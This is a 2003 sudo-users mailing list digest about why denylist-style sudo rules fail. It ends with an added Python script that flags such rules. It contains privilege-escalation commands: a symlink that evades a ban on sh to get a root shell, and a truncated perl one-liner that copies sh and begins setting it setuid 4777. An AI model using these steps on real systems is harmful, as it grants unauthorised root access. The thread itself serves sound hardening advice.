sudo-users Digest, Vol 6, Issue 6

Ladner, Eric (Eric.Ladner) Eric.Ladner at
Tue Jun 10 09:52:40 EDT 2003


Restricting things a user can't run usually doesn't work very well (as
you've illustrated below) unless it's a really really big list.

Consider the following:

sudo perl -e "system('cp /usr/bin/sh /var/tmp/xxx'); system('chmod 4777

Not to mention there are about a thousand other ways to do that using
other utilities (awk, vi, etc.)

Instead, consider building up a list of things that your approved sudo
folks CAN run.  That way you have a semi-manageable list of things you
can watch, rather than worrying about every little command on the


-----Original Message-----
From: Molumuri, Janardhan [mailto:mjanar at] 
Sent: Tuesday, June 10, 2003 01:46
To: 'sudo-users at'
Subject: RE: sudo-users Digest, Vol 6, Issue 6

Hi Folks,

Anybody have any ideas for this?

uid=22353(test) gid=10(test)
sudo sh
Sorry, user test is not allowed to execute '/usr/bin/sh' as root
>ln -s /usr/bin/sh ./test1
>sudo ./test1
# id
uid=0(root) gid=0(root)

Janardhan.
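
An added example, not part of the original thread or of sudo itself: a short Python check that flags sudoers entries written in the "ALL minus exceptions" style that the reply above advises against. The sample sudoers text and the function names are constructed for illustration, and the parser assumes simple rules (no escaped commas or `=` inside command arguments).

```python
import re

# Constructed sample sudoers content (not from the original thread).
SAMPLE = """\
# denylist style: everything except a shell
test    ALL = (root) ALL, !/usr/bin/sh, \\
                     !/usr/bin/ksh
# allowlist style: only named commands
backup  ALL = (root) NOPASSWD: /usr/sbin/dump, /usr/sbin/restore
Defaults env_reset
Cmnd_Alias SHELLS = /usr/bin/sh, /usr/bin/ksh
ops     ALL = ALL, !SHELLS
"""

# Line types that are not user specifications.
SKIP = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")

def logical_lines(text):
    """Yield (first_line_number, joined_line), folding backslash continuations."""
    buf, start = "", None
    for n, raw in enumerate(text.splitlines(), 1):
        if start is None:
            start = n
        if raw.rstrip().endswith("\\"):
            buf += raw.rstrip()[:-1] + " "
            continue
        yield start, buf + raw
        buf, start = "", None

def find_denylist_rules(text):
    """Return [(line, user, [negated entries])] for specs granting ALL minus exceptions."""
    findings = []
    for n, line in logical_lines(text):
        line = line.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith(SKIP) or "=" not in line:
            continue
        who, spec = line.split("=", 1)
        spec = re.sub(r"\([^)]*\)", "", spec)         # drop (runas) lists
        spec = re.sub(r"\b[A-Z_]+:", "", spec)        # drop tags such as NOPASSWD:
        cmds = [c.strip() for c in spec.split(",") if c.strip()]
        negated = [c[1:].strip() for c in cmds if c.startswith("!")]
        if "ALL" in cmds and negated:
            findings.append((n, who.split()[0], negated))
    return findings

if __name__ == "__main__":
    for n, user, negated in find_denylist_rules(SAMPLE):
        print(f"line {n}: {user} is granted ALL except {negated}; replace with an explicit command list")
```

Only the `test` and `ops` entries are reported; the `backup` entry, which names each permitted command, passes.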